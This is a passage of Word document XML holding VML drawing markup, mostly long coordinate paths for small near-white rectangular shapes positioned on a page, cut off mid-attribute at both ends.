3146,4407,3146,4411,3146,4416,3146,4421,3146,4427,3146,4432,3146,4437,3146,4443,3146,4448,3146,4454,3146,4460,3146,4465,3146,4471,3146,4477,3146,4484,3146,4490,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3146,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3145,4496,3144,4496,3144,4496,3144,4496,3144,4496,3144,4496,3144,4496,3143,4496,3143,4496,3143,4496,3143,4496,3143,4496,3142,4496,3142,4496,3142,4496,3141,4496,3141,4496,3141,4496,3140,4496,3140,4496,3140,4496,3139,4496,3139,4496,3138,4496,3138,4496,3137,4496,3137,4496,3136,4496,3136,4496,3135,4496,3134,4496,3134,4496,3133,4496,3132,4496,3132,4496,3131,4496,3130,4496,3129,4496,3129,4496,3128,4496,3127,4496,3126,4496,3125,4496,3124,4496,3123,4496,3122,4496,3121,4496,3120,4496,3119,4496,3118,4496,3117,4496,3116,4496,3114,4496,3113,4496,3112,4496,3110,4496,3109,4496,3108,4496,3106,4496,3105,4496,3103,4496,3102,4496,3100,4496,3099,4496,3097,4496,3095,4496,3094,4496,3092,4496,3090,4496,3088,4496,3086,4496,3084,4496,3083,4496,3081,4496,3079,4496,3076,4496,3074,4496,3072,4496,3070,4496,3068,4496,3065,4496,3063,4496,3061,4496,3058,4496,3056,4496,3053,4496,3051,4496,3048,4496,3045,4496,3043,4496,3040,4496,3037,4496,3034,4496,3031,4496,3029,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4496,3026,4495,3026,4495,3026,4495,3026,4495,3026,4495,3026,4494,3026,4494,3026,4494,3026,4494,3026,4493,3026,4493,3026,4493,3026,4492,3026,4492,3026,4491,3026,4491,3026,4490,3026,4490,3026,4489,3026,4489,3026,4488,3026,4487,3026,4487,3026,4486,3026,4485,3026,4484,3026,4483,3026,4482,3026,4482,3026,4481,3026,4480,3026,4478,3026,4477,3026,4476,3026,4475,3026,4474,3026,4472,3026,4471,3026,4470,3026,4468,3026,4467,3026,4465,3026,4464,3026,4462,3026,4460,3026,4458,3026,4457,3026,4455,3026,4453,3026,4451,3026,4449,3026,4447,3026,4444,3026,4442,3026,4440,3026,4437,3026,4435,3026,4432,3026,4430,3026,4427,3026,4424,3026,4422,3026,4419,3026,4416,3026,4413,3026,4410,3026,4407,3026,4403,3026,4400,3026,4397,3026,4393,3026,4390,3026,4386,3026,4382,3026,4378,3026,4374,3026,4371,3026,4366,3026,4362,3026,4358,3026,4354,3026,4349,3026,4345,3026,4340,3026,4336,3026,4331,3026,4326,3026,4321,3026,4316,3026,4311,3026,4306,3026,4300,3026,4295,3026,4289,3026,4284,3026,4278,3026,4272,3026,4266,3026,4260,3026,4254,3026,4248,3026,4241e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:4850;width:130;height:270" coordorigin="2650,4850" coordsize="130,270" path="m2665,4871l2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2665,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2666,4871,2667,4871,2667,4871,2667,4871,2667,4871,2667,4871,2667,4871,2668,4871,2668,4871,2668,4871,2668,4871,2669,4871,2669,4871,2669,4871,2670,4871,2670,4871,2670,4871,2671,4871,2671,4871,2671,4871,2672,4871,2672,4871,2673,4871,2673,4871,2674,4871,2674,4871,2675,4871,2675,4871,2676,4871,2677,4871,2677,4871,2678,4871,2679,4871,2679,4871,2680,4871,2681,4871,2682,4871,2682,4871,2683,4871,2684,4871,2685,4871,2686,4871,2687,4871,2688,4871,2689,4871,2690,4871,2691,4871,2692,4871,2693,4871,2694,4871,2695,4871,2697,4871,2698,4871,2699,4871,2700,4871,2702,4871,2703,4871,2705,4871,2706,4871,2708,4871,2709,4871,2711,4871,2712,4871,2714,4871,2716,4871,2717,4871,2719,4871,2721,4871,2723,4871,2725,4871,2726,4871,2728,4871,2730,4871,2732,4871,2734,4871,2737,4871,2739,4871,2741,4871,2743,4871,2745,4871,2748,4871,2750,4871,2753,4871,2755,4871,2758,4871,2760,4871,2763,4871,2765,4871,2768,4871,2771,4871,2774,4871,2777,4871,2779,4871,2782,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4871,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4872,2785,4873,2785,4873,2785,4873,2785,4873,2785,4874,2785,4874,2785,4874,2785,4874,2785,4875,2785,4875,2785,4876,2785,4876,2785,4876,2785,4877,2785,4877,2785,4878,2785,4879,2785,4879,2785,4880,2785,4880,2785,4881,2785,4882,2785,4883,2785,4883,2785,4884,2785,4885,2785,4886,2785,4887,2785,4888,2785,4889,2785,4890,2785,4892,2785,4893,2785,4894,2785,4895,2785,4897,2785,4898,2785,4899,2785,4901,2785,4903,2785,4904,2785,4906,2785,4908,2785,4909,2785,4911,2785,4913,2785,4915,2785,4917,2785,4919,2785,4921,2785,4923,2785,4926,2785,4928,2785,4930,2785,4933,2785,4935,2785,4938,2785,4941,2785,4943,2785,4946,2785,4949,2785,4952,2785,4955,2785,4958,2785,4961,2785,4964,2785,4968,2785,4971,2785,4975,2785,4978,2785,4982,2785,4986,2785,4989,2785,4993,2785,4997,2785,5001,2785,5005,2785,5010,2785,5014,2785,5018,2785,5023,2785,5027,2785,5032,2785,5037,2785,5042,2785,5047,2785,5052,2785,5057,2785,5062,2785,5068,2785,5073,2785,5079,2785,5084,2785,5090,2785,5096,2785,5102,2785,5108,2785,5114,2785,5120,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2785,5127,2784,5127,2784,5127,2784,5127,2784,5127,2784,5127,2784,5127,2783,5127,2783,5127,2783,5127,2783,5127,2783,5127,2782,5127,2782,5127,2782,5127,2781,5127,2781,5127,2781,5127,2780,5127,2780,5127,2780,5127,2779,5127,2779,5127,2778,5127,2778,5127,2778,5127,2777,5127,2776,5127,2776,5127,2775,5127,2775,5127,2774,5127,2774,5127,2773,5127,2772,5127,2772,5127,2771,5127,2770,5127,2769,5127,2768,5127,2768,5127,2767,5127,2766,5127,2765,5127,2764,5127,2763,5127,2762,5127,2761,5127,2760,5127,2759,5127,2758,5127,2757,5127,2755,5127,2754,5127,2753,5127,2752,5127,2750,5127,2749,5127,2748,5127,2746,5127,2745,5127,2743,5127,2742,5127,2740,5127,2738,5127,2737,5127,2735,5127,2733,5127,2732,5127,2730,5127,2728,5127,2726,5127,2724,5127,2722,5127,2720,5127,2718,5127,2716,5127,2714,5127,2712,5127,2710,5127,2708,5127,2705,5127,2703,5127,2701,5127,2698,5127,2696,5127,2693,5127,2691,5127,2688,5127,2685,5127,2683,5127,2680,5127,2677,5127,2674,5127,2671,5127,2668,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5127,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5126,2665,5125,2665,5125,2665,5125,2665,5125,2665,5124,2665,5124,2665,5124,2665,5124,2665,5123,2665,5123,2665,5122,2665,5122,2665,5122,2665,5121,2665,5121,2665,5120,2665,5120,2665,5119,2665,5118,2665,5118,2665,5117,2665,5116,2665,5115,2665,5115,2665,5114,2665,5113,2665,5112,2665,5111,2665,5110,2665,5109,2665,5108,2665,5106,2665,5105,2665,5104,2665,5103,2665,5101,2665,5100,2665,5099,2665,5097,2665,5095,2665,5094,2665,5092,2665,5090,2665,5089,2665,5087,2665,5085,2665,5083,2665,5081,2665,5079,2665,5077,2665,5075,2665,5072,2665,5070,2665,5068,2665,5065,2665,5063,2665,5060,2665,5057,2665,5055,2665,5052,2665,5049,2665,5046,2665,5043,2665,5040,2665,5037,2665,5034,2665,5030,2665,5027,2665,5023,2665,5020,2665,5016,2665,5012,2665,5009,2665,5005,2665,5001,2665,4997,2665,4993,2665,4988,2665,4984,2665,4980,2665,4975,2665,4971,2665,4966,2665,4961,2665,4956,2665,4951,2665,4946,2665,4941,2665,4936,2665,4931,2665,4925,2665,4920,2665,4914,2665,4908,2665,4902,2665,4896,2665,4890,2665,4884,2665,4878,2665,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:242.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,4850" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:4850;width:130;height:270" coordorigin="3010,4850" coordsize="130,270" path="m3026,4871l3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3026,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3027,4871,3028,4871,3028,4871,3028,4871,3028,4871,3029,4871,3029,4871,3029,4871,3029,4871,3030,4871,3030,4871,3030,4871,3031,4871,3031,4871,3032,4871,3032,4871,3032,4871,3033,4871,3033,4871,3034,4871,3034,4871,3035,4871,3036,4871,3036,4871,3037,4871,3037,4871,3038,4871,3039,4871,3039,4871,3040,4871,3041,4871,3042,4871,3043,4871,3043,4871,3044,4871,3045,4871,3046,4871,3047,4871,3048,4871,3049,4871,3050,4871,3051,4871,3052,4871,3053,4871,3054,4871,3056,4871,3057,4871,3058,4871,3059,4871,3061,4871,3062,4871,3063,4871,3065,4871,3066,4871,3068,4871,3069,4871,3071,4871,3072,4871,3074,4871,3076,4871,3077,4871,3079,4871,3081,4871,3083,4871,3085,4871,3087,4871,3089,4871,3091,4871,3093,4871,3095,4871,3097,4871,3099,4871,3101,4871,3103,4871,3106,4871,3108,4871,3110,4871,3113,4871,3115,4871,3118,4871,3120,4871,3123,4871,3126,4871,3128,4871,3131,4871,3134,4871,3137,4871,3140,4871,3143,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4871,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4872,3146,4873,3146,4873,3146,4873,3146,4873,3146,4874,3146,4874,3146,4874,3146,4874,3146,4875,3146,4875,3146,4876,3146,4876,3146,4876,3146,4877,3146,4877,3146,4878,3146,4879,3146,4879,3146,4880,3146,4880,3146,4881,3146,4882,3146,4883,3146,4883,3146,4884,3146,4885,3146,4886,3146,4887,3146,4888,3146,4889,3146,4890,3146,4892,3146,4893,3146,4894,3146,4895,3146,4897,3146,4898,3146,4899,3146,4901,3146,4903,3146,4904,3146,4906,3146,4908,3146,4909,3146,4911,3146,4913,3146,4915,3146,4917,3146,4919,3146,4921,3146,4923,3146,4926,3146,4928,3146,4930,3146,4933,3146,4935,3146,4938,3146,4941,3146,4943,3146,4946,3146,4949,3146,4952,3146,4955,3146,4958,3146,4961,3146,4964,3146,4968,3146,4971,3146,4975,3146,4978,3146,4982,3146,4986,3146,4989,3146,4993,3146,4997,3146,5001,3146,5005,3146,5010,3146,5014,3146,5018,3146,5023,3146,5027,3146,5032,3146,5037,3146,5042,3146,5047,3146,5052,3146,5057,3146,5062,3146,5068,3146,5073,3146,5079,3146,5084,3146,5090,3146,5096,3146,5102,3146,5108,3146,5114,3146,5120,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3146,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3145,5127,3144,5127,3144,5127,3144,5127,3144,5127,3144,5127,3144,5127,3143,5127,3143,5127,3143,5127,3143,5127,3143,5127,3142,5127,3142,5127,3142,5127,3141,5127,3141,5127,3141,5127,3140,5127,3140,5127,3140,5127,3139,5127,3139,5127,3138,5127,3138,5127,3137,5127,3137,5127,3136,5127,3136,5127,3135,5127,3134,5127,3134,5127,3133,5127,3132,5127,3132,5127,3131,5127,3130,5127,3129,5127,3129,5127,3128,5127,3127,5127,3126,5127,3125,5127,3124,5127,3123,5127,3122,5127,3121,5127,3120,5127,3119,5127,3118,5127,3117,5127,3116,5127,3114,5127,3113,5127,3112,5127,3110,5127,3109,5127,3108,5127,3106,5127,3105,5127,3103,5127,3102,5127,3100,5127,3099,5127,3097,5127,3095,5127,3094,5127,3092,5127,3090,5127,3088,5127,3086,5127,3084,5127,3083,5127,3081,5127,3079,5127,3076,5127,3074,5127,3072,5127,3070,5127,3068,5127,3065,5127,3063,5127,3061,5127,3058,5127,3056,5127,3053,5127,3051,5127,3048,5127,3045,5127,3043,5127,3040,5127,3037,5127,3034,5127,3031,5127,3029,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5127,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5126,3026,5125,3026,5125,3026,5125,3026,5125,3026,5124,3026,5124,3026,5124,3026,5124,3026,5123,3026,5123,3026,5122,3026,5122,3026,5122,3026,5121,3026,5121,3026,5120,3026,5120,3026,5119,3026,5118,3026,5118,3026,5117,3026,5116,3026,5115,3026,5115,3026,5114,3026,5113,3026,5112,3026,5111,3026,5110,3026,5109,3026,5108,3026,5106,3026,5105,3026,5104,3026,5103,3026,5101,3026,5100,3026,5099,3026,5097,3026,5095,3026,5094,3026,5092,3026,5090,3026,5089,3026,5087,3026,5085,3026,5083,3026,5081,3026,5079,3026,5077,3026,5075,3026,5072,3026,5070,3026,5068,3026,5065,3026,5063,3026,5060,3026,5057,3026,5055,3026,5052,3026,5049,3026,5046,3026,5043,3026,5040,3026,5037,3026,5034,3026,5030,3026,5027,3026,5023,3026,5020,3026,5016,3026,5012,3026,5009,3026,5005,3026,5001,3026,4997,3026,4993,3026,4988,3026,4984,3026,4980,3026,4975,3026,4971,3026,4966,3026,4961,3026,4956,3026,4951,3026,4946,3026,4941,3026,4936,3026,4931,3026,4925,3026,4920,3026,4914,3026,4908,3026,4902,3026,4896,3026,4890,3026,4884,3026,4878,3026,4871e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:5490;width:130;height:270" coordorigin="2650,5490" coordsize="130,270" path="m2665,5517l2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2665,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2666,5517,2667,5517,2667,5517,2667,5517,2667,5517,2667,5517,2667,5517,2668,5517,2668,5517,2668,5517,2668,5517,2669,5517,2669,5517,2669,5517,2670,5517,2670,5517,2670,5517,2671,5517,2671,5517,2671,5517,2672,5517,2672,5517,2673,5517,2673,5517,2674,5517,2674,5517,2675,5517,2675,5517,2676,5517,2677,5517,2677,5517,2678,5517,2679,5517,2679,5517,2680,5517,2681,5517,2682,5517,2682,5517,2683,5517,2684,5517,2685,5517,2686,5517,2687,5517,2688,5517,2689,5517,2690,5517,2691,5517,2692,5517,2693,5517,2694,5517,2695,5517,2697,5517,2698,5517,2699,5517,2700,5517,2702,5517,2703,5517,2705,5517,2706,5517,2708,5517,2709,5517,2711,5517,2712,5517,2714,5517,2716,5517,2717,5517,2719,5517,2721,5517,2723,5517,2725,5517,2726,5517,2728,5517,2730,5517,2732,5517,2734,5517,2737,5517,2739,5517,2741,5517,2743,5517,2745,5517,2748,5517,2750,5517,2753,5517,2755,5517,2758,5517,2760,5517,2763,5517,2765,5517,2768,5517,2771,5517,2774,5517,2777,5517,2779,5517,2782,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5517,2785,5518,2785,5518,2785,5518,2785,5518,2785,5518,2785,5518,2785,5519,2785,5519,2785,5519,2785,5519,2785,5520,2785,5520,2785,5520,2785,5521,2785,5521,2785,5522,2785,5522,2785,5523,2785,5523,2785,5524,2785,5524,2785,5525,2785,5526,2785,5526,2785,5527,2785,5528,2785,5529,2785,5530,2785,5531,2785,5532,2785,5532,2785,5534,2785,5535,2785,5536,2785,5537,2785,5538,2785,5539,2785,5541,2785,5542,2785,5543,2785,5545,2785,5546,2785,5548,2785,5549,2785,5551,2785,5553,2785,5555,2785,5556,2785,5558,2785,5560,2785,5562,2785,5564,2785,5567,2785,5569,2785,5571,2785,5573,2785,5576,2785,5578,2785,5581,2785,5583,2785,5586,2785,5589,2785,5591,2785,5594,2785,5597,2785,5600,2785,5603,2785,5607,2785,5610,2785,5613,2785,5616,2785,5620,2785,5624,2785,5627,2785,5631,2785,5635,2785,5639,2785,5643,2785,5647,2785,5651,2785,5655,2785,5659,2785,5664,2785,5668,2785,5673,2785,5677,2785,5682,2785,5687,2785,5692,2785,5697,2785,5702,2785,5707,2785,5713,2785,5718,2785,5724,2785,5729,2785,5735,2785,5741,2785,5747,2785,5753,2785,5759,2785,5766,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2785,5772,2784,5772,2784,5772,2784,5772,2784,5772,2784,5772,2784,5772,2783,5772,2783,5772,2783,5772,2783,5772,2783,5772,2782,5772,2782,5772,2782,5772,2781,5772,2781,5772,2781,5772,2780,5772,2780,5772,2780,5772,2779,5772,2779,5772,2778,5772,2778,5772,2778,5772,2777,5772,2776,5772,2776,5772,2775,5772,2775,5772,2774,5772,2774,5772,2773,5772,2772,5772,2772,5772,2771,5772,2770,5772,2769,5772,2768,5772,2768,5772,2767,5772,2766,5772,2765,5772,2764,5772,2763,5772,2762,5772,2761,5772,2760,5772,2759,5772,2758,5772,2757,5772,2755,5772,2754,5772,2753,5772,2752,5772,2750,5772,2749,5772,2748,5772,2746,5772,2745,5772,2743,5772,2742,5772,2740,5772,2738,5772,2737,5772,2735,5772,2733,5772,2732,5772,2730,5772,2728,5772,2726,5772,2724,5772,2722,5772,2720,5772,2718,5772,2716,5772,2714,5772,2712,5772,2710,5772,2708,5772,2705,5772,2703,5772,2701,5772,2698,5772,2696,5772,2693,5772,2691,5772,2688,5772,2685,5772,2683,5772,2680,5772,2677,5772,2674,5772,2671,5772,2668,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5772,2665,5771,2665,5771,2665,5771,2665,5771,2665,5771,2665,5771,2665,5771,2665,5771,2665,5770,2665,5770,2665,5770,2665,5770,2665,5769,2665,5769,2665,5769,2665,5768,2665,5768,2665,5767,2665,5767,2665,5766,2665,5766,2665,5765,2665,5765,2665,5764,2665,5764,2665,5763,2665,5762,2665,5761,2665,5761,2665,5760,2665,5759,2665,5758,2665,5757,2665,5756,2665,5755,2665,5754,2665,5753,2665,5752,2665,5751,2665,5749,2665,5748,2665,5747,2665,5745,2665,5744,2665,5742,2665,5741,2665,5739,2665,5738,2665,5736,2665,5734,2665,5732,2665,5730,2665,5728,2665,5726,2665,5724,2665,5722,2665,5720,2665,5718,2665,5715,2665,5713,2665,5711,2665,5708,2665,5705,2665,5703,2665,5700,2665,5697,2665,5694,2665,5691,2665,5688,2665,5685,2665,5682,2665,5679,2665,5676,2665,5672,2665,5669,2665,5665,2665,5662,2665,5658,2665,5654,2665,5650,2665,5646,2665,5642,2665,5638,2665,5634,2665,5629,2665,5625,2665,5621,2665,5616,2665,5611,2665,5606,2665,5602,2665,5597,2665,5592,2665,5586,2665,5581,2665,5576,2665,5570,2665,5565,2665,5559,2665,5553,2665,5548,2665,5542,2665,5536,2665,5529,2665,5523,2665,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:5490;width:130;height:270" coordorigin="3010,5490" coordsize="130,270" path="m3026,5517l3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3026,5517,3027,5517,3027,5517,3027,5517,3027,5517,3027,5517,3027,5517,3027,5517,3028,5517,3028,5517,3028,5517,3028,5517,3029,5517,3029,5517,3029,5517,3029,5517,3030,5517,3030,5517,3030,5517,3031,5517,3031,5517,3032,5517,3032,5517,3032,5517,3033,5517,3033,5517,3034,5517,3034,5517,3035,5517,3036,5517,3036,5517,3037,5517,3037,5517,3038,5517,3039,5517,3039,5517,3040,5517,3041,5517,3042,5517,3043,5517,3043,5517,3044,5517,3045,5517,3046,5517,3047,5517,3048,5517,3049,5517,3050,5517,3051,5517,3052,5517,3053,5517,3054,5517,3056,5517,3057,5517,3058,5517,3059,5517,3061,5517,3062,5517,3063,5517,3065,5517,3066,5517,3068,5517,3069,5517,3071,5517,3072,5517,3074,5517,3076,5517,3077,5517,3079,5517,3081,5517,3083,5517,3085,5517,3087,5517,3089,5517,3091,5517,3093,5517,3095,5517,3097,5517,3099,5517,3101,5517,3103,5517,3106,5517,3108,5517,3110,5517,3113,5517,3115,5517,3118,5517,3120,5517,3123,5517,3126,5517,3128,5517,3131,5517,3134,5517,3137,5517,3140,5517,3143,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5517,3146,5518,3146,5518,3146,5518,3146,5518,3146,5518,3146,5518,3146,5519,3146,5519,3146,5519,3146,5519,3146,5520,3146,5520,3146,5520,3146,5521,3146,5521,3146,5522,3146,5522,3146,5523,3146,5523,3146,5524,3146,5524,3146,5525,3146,5526,3146,5526,3146,5527,3146,5528,3146,5529,3146,5530,3146,5531,3146,5532,3146,5532,3146,5534,3146,5535,3146,5536,3146,5537,3146,5538,3146,5539,3146,5541,3146,5542,3146,5543,3146,5545,3146,5546,3146,5548,3146,5549,3146,5551,3146,5553,3146,5555,3146,5556,3146,5558,3146,5560,3146,5562,3146,5564,3146,5567,3146,5569,3146,5571,3146,5573,3146,5576,3146,5578,3146,5581,3146,5583,3146,5586,3146,5589,3146,5591,3146,5594,3146,5597,3146,5600,3146,5603,3146,5607,3146,5610,3146,5613,3146,5616,3146,5620,3146,5624,3146,5627,3146,5631,3146,5635,3146,5639,3146,5643,3146,5647,3146,5651,3146,5655,3146,5659,3146,5664,3146,5668,3146,5673,3146,5677,3146,5682,3146,5687,3146,5692,3146,5697,3146,5702,3146,5707,3146,5713,3146,5718,3146,5724,3146,5729,3146,5735,3146,5741,3146,5747,3146,5753,3146,5759,3146,5766,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3146,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3145,5772,3144,5772,3144,5772,3144,5772,3144,5772,3144,5772,3144,5772,3143,5772,3143,5772,3143,5772,3143,5772,3143,5772,3142,5772,3142,5772,3142,5772,3141,5772,3141,5772,3141,5772,3140,5772,3140,5772,3140,5772,3139,5772,3139,5772,3138,5772,3138,5772,3137,5772,3137,5772,3136,5772,3136,5772,3135,5772,3134,5772,3134,5772,3133,5772,3132,5772,3132,5772,3131,5772,3130,5772,3129,5772,3129,5772,3128,5772,3127,5772,3126,5772,3125,5772,3124,5772,3123,5772,3122,5772,3121,5772,3120,5772,3119,5772,3118,5772,3117,5772,3116,5772,3114,5772,3113,5772,3112,5772,3110,5772,3109,5772,3108,5772,3106,5772,3105,5772,3103,5772,3102,5772,3100,5772,3099,5772,3097,5772,3095,5772,3094,5772,3092,5772,3090,5772,3088,5772,3086,5772,3084,5772,3083,5772,3081,5772,3079,5772,3076,5772,3074,5772,3072,5772,3070,5772,3068,5772,3065,5772,3063,5772,3061,5772,3058,5772,3056,5772,3053,5772,3051,5772,3048,5772,3045,5772,3043,5772,3040,5772,3037,5772,3034,5772,3031,5772,3029,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5772,3026,5771,3026,5771,3026,5771,3026,5771,3026,5771,3026,5771,3026,5771,3026,5771,3026,5770,3026,5770,3026,5770,3026,5770,3026,5769,3026,5769,3026,5769,3026,5768,3026,5768,3026,5767,3026,5767,3026,5766,3026,5766,3026,5765,3026,5765,3026,5764,3026,5764,3026,5763,3026,5762,3026,5761,3026,5761,3026,5760,3026,5759,3026,5758,3026,5757,3026,5756,3026,5755,3026,5754,3026,5753,3026,5752,3026,5751,3026,5749,3026,5748,3026,5747,3026,5745,3026,5744,3026,5742,3026,5741,3026,5739,3026,5738,3026,5736,3026,5734,3026,5732,3026,5730,3026,5728,3026,5726,3026,5724,3026,5722,3026,5720,3026,5718,3026,5715,3026,5713,3026,5711,3026,5708,3026,5705,3026,5703,3026,5700,3026,5697,3026,5694,3026,5691,3026,5688,3026,5685,3026,5682,3026,5679,3026,5676,3026,5672,3026,5669,3026,5665,3026,5662,3026,5658,3026,5654,3026,5650,3026,5646,3026,5642,3026,5638,3026,5634,3026,5629,3026,5625,3026,5621,3026,5616,3026,5611,3026,5606,3026,5602,3026,5597,3026,5592,3026,5586,3026,5581,3026,5576,3026,5570,3026,5565,3026,5559,3026,5553,3026,5548,3026,5542,3026,5536,3026,5529,3026,5523,3026,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:414.500pt;margin-top:274.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8290,5490" coordsize="130,270">
        <v:shape style="position:absolute;left:8290;top:5490;width:130;height:270" coordorigin="8290,5490" coordsize="130,270" path="m8308,5517l8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8308,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8309,5517,8310,5517,8310,5517,8310,5517,8310,5517,8310,5517,8311,5517,8311,5517,8311,5517,8311,5517,8312,5517,8312,5517,8312,5517,8312,5517,8313,5517,8313,5517,8313,5517,8314,5517,8314,5517,8315,5517,8315,5517,8316,5517,8316,5517,8317,5517,8317,5517,8318,5517,8318,5517,8319,5517,8319,5517,8320,5517,8321,5517,8321,5517,8322,5517,8323,5517,8324,5517,8324,5517,8325,5517,8326,5517,8327,5517,8328,5517,8329,5517,8330,5517,8331,5517,8332,5517,8333,5517,8334,5517,8335,5517,8336,5517,8337,5517,8338,5517,8339,5517,8341,5517,8342,5517,8343,5517,8345,5517,8346,5517,8347,5517,8349,5517,8350,5517,8352,5517,8354,5517,8355,5517,8357,5517,8358,5517,8360,5517,8362,5517,8364,5517,8365,5517,8367,5517,8369,5517,8371,5517,8373,5517,8375,5517,8377,5517,8379,5517,8382,5517,8384,5517,8386,5517,8388,5517,8391,5517,8393,5517,8395,5517,8398,5517,8400,5517,8403,5517,8406,5517,8408,5517,8411,5517,8414,5517,8417,5517,8419,5517,8422,5517,8425,5517,8428,5517,8428,5517,8428,5517,8428,5517,8428,5517,8428,5